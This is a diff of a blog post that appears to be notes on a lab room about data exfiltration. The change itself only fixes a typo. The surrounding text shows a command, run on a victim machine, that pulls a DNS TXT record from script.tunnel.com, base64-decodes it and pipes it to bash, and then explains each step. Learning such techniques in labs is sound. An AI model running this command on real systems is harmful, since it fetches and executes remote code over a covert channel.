CSpanias/cspanias.github.io/_posts/2023-10-20-Data Exfiltration.md

     ```shell
     thm@victim2$ dig +short -t TXT script.tunnel.com | tr -d "\"" | base64 -d | bash
     ```
-    As we know by know, the above command:
+    As we know by now, the above command:
     1. Makes a DNS lookup for a TXT record for the domain `script.tunnel.com`.
     2. Removes double quotes, `"`, from the output.
     3. Decodes the base64 encoded text.